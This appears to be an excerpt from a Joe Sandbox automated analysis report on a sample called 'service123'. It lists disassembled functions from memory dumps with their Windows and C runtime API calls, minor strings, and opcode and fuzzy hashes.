Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: d380445a6259185a655249e127de409b39fa46d068960c8c3ee4bbc739d9e65c
Instruction ID: 148f1689170c8b054cdaa6890ae7f52217ad4a846671d1715f6b8519d38054db
Opcode Fuzzy Hash: d380445a6259185a655249e127de409b39fa46d068960c8c3ee4bbc739d9e65c
Instruction Fuzzy Hash: F93182B16167558FCB00BF28C48188ABBE4FF15618B4649ADECC48B711D332EC59CF92

Function 6C2C9660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C2C96B2
MultiByteToWideChar.KERNEL32 ref: 6C2C96F5

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: e8b07b0c6acf88ce22e9f7b5aa6ba00114972037126a0cf3134d7ccddfecf68b
Instruction ID: fd85d89da2f8ccd1c2de26554fb5960f0f453c5cb7b0a4bb18d31886ce950f23
Opcode Fuzzy Hash: e8b07b0c6acf88ce22e9f7b5aa6ba00114972037126a0cf3134d7ccddfecf68b
Instruction Fuzzy Hash: 8C3127B060A3458FD740EF29D48424ABBF0BF86319F108A5DF89487790D376D958CB43

Function 00AC7C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00AC7C92
MultiByteToWideChar.KERNEL32 ref: 00AC7CD5

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: fabae66939396ed987434826b51b9e090d4818c449147dd48fbbed24914df276
Instruction ID: bd02f9138f51e38b94056b8a5bd4ea7d79ed20c4af6128989574d694470714a0
Opcode Fuzzy Hash: fabae66939396ed987434826b51b9e090d4818c449147dd48fbbed24914df276
Instruction Fuzzy Hash: 9B31EEB050C3418FD711DF29D584B6ABBF0BF85314F05892EE8958B250E7B6D849CF92

Function 6C2BF511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2BF5C1

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: f05a33ddf46b83bdf4b5b3d7704c9f69c85dc0ad903205abf489a90626551392
Instruction ID: 497b91fe909377347a78c51bb1a653209ed1f9aaee882da19f94c517ce49ddff
Opcode Fuzzy Hash: f05a33ddf46b83bdf4b5b3d7704c9f69c85dc0ad903205abf489a90626551392
Instruction Fuzzy Hash: 634159B8A0A3068FDB00DF29D5847877BF8BB4635CF148219EC585B294D330E546CB92

Function 6C2BF6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2BF751

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 74a2dd57fde4c668f820688e614c06a8b95daddb4db1a11218243e9d669ae35a
Instruction ID: afbe8057500225bf756c5a2a3ed39c7459ccde43ad96d7c5359f594aaec0aa60
Opcode Fuzzy Hash: 74a2dd57fde4c668f820688e614c06a8b95daddb4db1a11218243e9d669ae35a
Instruction Fuzzy Hash: B9315AB8A06306CFDB009F29C5887477BF8BB4735DF14825AEC545B698D331E449CB92

Function 6C2BF9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2BFA72
CreateSemaphoreW.KERNEL32 ref: 6C2BFAB7
WaitForSingleObject.KERNEL32 ref: 6C2BFB00

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 085b01bb81a7ea979486a6f03b3616fadbd1a597d1cb073f2615ee3d3ce6dd12
Instruction ID: 4d0f708001a8210d08c86e037ef2437fd982a2d5a35cc8b7f41af131d85355a0
Opcode Fuzzy Hash: 085b01bb81a7ea979486a6f03b3616fadbd1a597d1cb073f2615ee3d3ce6dd12
Instruction Fuzzy Hash: 153117B860A306CFDB14DF2DC5987477BF8BB4A359F148619E8989B284D730E5058B92

Function 6C2BFB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2BFBF2
CreateSemaphoreW.KERNEL32 ref: 6C2BFC37
WaitForSingleObject.KERNEL32 ref: 6C2BFC80

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 6fbbf213256eefd44ee1a9d910c5391bc7de589bc9975407da2ecaa53b0ae514
Instruction ID: e7e4a0c02bab5e21948d6e82bc34b53e61e8571844c63cfb84dc1a91d87ffb10
Opcode Fuzzy Hash: 6fbbf213256eefd44ee1a9d910c5391bc7de589bc9975407da2ecaa53b0ae514
Instruction Fuzzy Hash: 1A312AB860A306CFDB01DF29C5887477BF8BB47399F148259EC589B284C734E449CB92

Function 6C2B55A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2B72FE

Strings

}, xrefs: 6C2B7392
this, xrefs: 6C2B55B3
{parm#, xrefs: 6C2B72D9

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 91daa218216c4d06b95857f1a27e6bc906f75898b10218e8373849b37299e394
Instruction ID: 7e4505e0e41f40566e19a01983dac62ab2fd37c8811fb06196c87bfac976717b
Opcode Fuzzy Hash: 91daa218216c4d06b95857f1a27e6bc906f75898b10218e8373849b37299e394
Instruction Fuzzy Hash: E421AE7050D746CFD7018F18C0807A9BBA1AF91748F18C9BEECC86FA0AD77594858BA2

Function 00AC1001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00AC106B
__p__fmode.MSVCRT ref: 00AC1070
__p__commode.MSVCRT ref: 00AC107D

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: eca81a93e5a42043711052fa8ab52abb412754c0950c2e3907ef374b980c622f
Instruction ID: b556bcb11ec67e7ae14f09ae7a641f7f314af43deacfaaaecb428df3826c106f
Opcode Fuzzy Hash: eca81a93e5a42043711052fa8ab52abb412754c0950c2e3907ef374b980c622f
Instruction Fuzzy Hash: 16214770600201CBCB14EF68C945FA933B1BB02348F97856DC45A4B26AE77AD8C7DB95

Function 6C329F70 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C329F85
strlen.MSVCRT ref: 6C329F8F
memcpy.MSVCRT ref: 6C329FB8
setlocale.MSVCRT ref: 6C329FCC

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: fbfaa0cba69eaa7b3c11b29bfe19cedcfb440528821b52efe462a4666235ef92
Instruction ID: 949155c0bc1b4f656bff2cc5cf6c4751a03b8885e8edafd1136ed6aa05590581
Opcode Fuzzy Hash: fbfaa0cba69eaa7b3c11b29bfe19cedcfb440528821b52efe462a4666235ef92
Instruction Fuzzy Hash: 7AF05EB16093109ED3407F6994453AFBBE4EF80748F018D1DE8C88B750E7758444CB93

Function 6C2C4C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C2C4C66
@, xrefs: 6C2C4D17

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 629c896430999df856a5594766f687a17fdb26e076539862a2d5ae0710285179
Instruction ID: 62569b7f7509cef8b5f98de1df291cf62b83d1a8c3f610953866a60da4da2ee5
Opcode Fuzzy Hash: 629c896430999df856a5594766f687a17fdb26e076539862a2d5ae0710285179
Instruction Fuzzy Hash: FCA17C7170839A8BD7A08E25C0907ABBBE1BB85309F14872DECD887651D735D649DB83

Function 00AC4558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

@, xrefs: 00AC4647
u, xrefs: 00AC4596

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 4c7e135d53e784a022503a23cd0b8c47e5997a0d98324006cc61ac74e537ab13
Instruction ID: c949ce556dddfe46ed2be943f79181041767505c32d09005c1ebea34be774702
Opcode Fuzzy Hash: 4c7e135d53e784a022503a23cd0b8c47e5997a0d98324006cc61ac74e537ab13
Instruction Fuzzy Hash: B7A1A03550C3958BCB31CF24C0A0BAABBF1BF89314F168A1DE8D987281D735D945CB86

Function 6C2C52F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2C548E

Part of subcall function 6C2C2F00: fputc.MSVCRT ref: 6C2C2FC8

Strings

@, xrefs: 6C2C4D17
(null), xrefs: 6C2C52F7

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: c681bda99dd0a7b3bc3e916293d81c255549d1f7de8b242de6de66f904fe5175
Instruction ID: 18dd03741fda397c189464b95c0084a5a345fc4a677395f15c618deebbbdd80b
Opcode Fuzzy Hash: c681bda99dd0a7b3bc3e916293d81c255549d1f7de8b242de6de66f904fe5175
Instruction Fuzzy Hash: D2918C7170839A8BD7A18E24C0907ABBBE1BB85309F14872DECD887751D735E50ADB83

Function 00AC4C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00AC4DBE

Part of subcall function 00AC2830: fputc.MSVCRT ref: 00AC28F8

Strings

@, xrefs: 00AC4647
(null), xrefs: 00AC4C27

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 0db93e3cb17dcd6b1e3517d88666f6215da4af39dc2026496943e73e25d79e9e
Instruction ID: 65aaa69c362b01895810ca3784ba92dddb383f124b4893a71e456f9f7b09cf27
Opcode Fuzzy Hash: 0db93e3cb17dcd6b1e3517d88666f6215da4af39dc2026496943e73e25d79e9e
Instruction Fuzzy Hash: F991B13560C3958BD7318F24C0A0BAABBF1BF89314F168A1DE8D997382D735D905DB86

Function 6C345DB0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C345DEA
wcslen.MSVCRT ref: 6C345E7C
wcslen.MSVCRT ref: 6C345F0E
strlen.MSVCRT ref: 6C345FA0

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 66211190abe174bd28de0ad3168bea3e03d88a2c0680da271d8a651d37cfbeb0
Instruction ID: 310edac04faa0f50b7e6a16aa83adf38ca3d33d92485b5f0b83a6856ca45661f
Opcode Fuzzy Hash: 66211190abe174bd28de0ad3168bea3e03d88a2c0680da271d8a651d37cfbeb0
Instruction Fuzzy Hash: 37F129B4A05606CFCB00DFACC4849AEBBF1BF44314B118A69E895DBB54E735E945CF82

Function 6C3455D0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C34560A
wcslen.MSVCRT ref: 6C34569C
wcslen.MSVCRT ref: 6C34572E
strlen.MSVCRT ref: 6C3457C0

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 184ffbe89018be83d237350e85b8eb30032e7aa04b21ee133b97e7f8dbc973c3
Instruction ID: dd9f7801c875315a0611ebbc360dcae876454d109eb5aefaebd81cfd8bd846da
Opcode Fuzzy Hash: 184ffbe89018be83d237350e85b8eb30032e7aa04b21ee133b97e7f8dbc973c3
Instruction Fuzzy Hash: 53F11AB4A056058FCB00DF6CC0849AEBBF4FF44324B118A69D895DBB54E735E945CF82

Function 6C2C3080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2C3101

Strings

NaN, xrefs: 6C2C3081

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: cecf1b7f06c2ce37ab18c2b0b4879e40f983be2dc8398b2d5911ecc452d1f2e6
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: 804118B1B056198FCB50DF1CC4807C5B7E1BF85709B298B99EC488F74AD372D8468B92

Function 00AC29B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00AC2A31

Strings

NaN, xrefs: 00AC29B1

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: ad903f67f58118fc67b028944eb19e7488ca4da328381819367397d6d596bc1a
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 444123B1A04215CBDB24CF19C5C4B56B7E1AF88740F2A82ADDC999F24AD732DC428B90

Function 6C344DD0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C344E0A
strlen.MSVCRT ref: 6C344E8D
strlen.MSVCRT ref: 6C344F10
strlen.MSVCRT ref: 6C344F93

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 774eb48bc1f78793fcc90328a38ef66dbcb48499258aa7e590cffe4410335df3
Instruction ID: 09870479f7e4e1b5ff2cbfe08defb93f72e7eade07509b117e533e5e230eba8a
Opcode Fuzzy Hash: 774eb48bc1f78793fcc90328a38ef66dbcb48499258aa7e590cffe4410335df3
Instruction Fuzzy Hash: 21E14574A056098FCB00DFACC0849AEFBF1BF45314B118A69E895CBB54E735E945CF92

Function 6C3445D0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C34460A
strlen.MSVCRT ref: 6C34468D
strlen.MSVCRT ref: 6C344710
strlen.MSVCRT ref: 6C344793

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
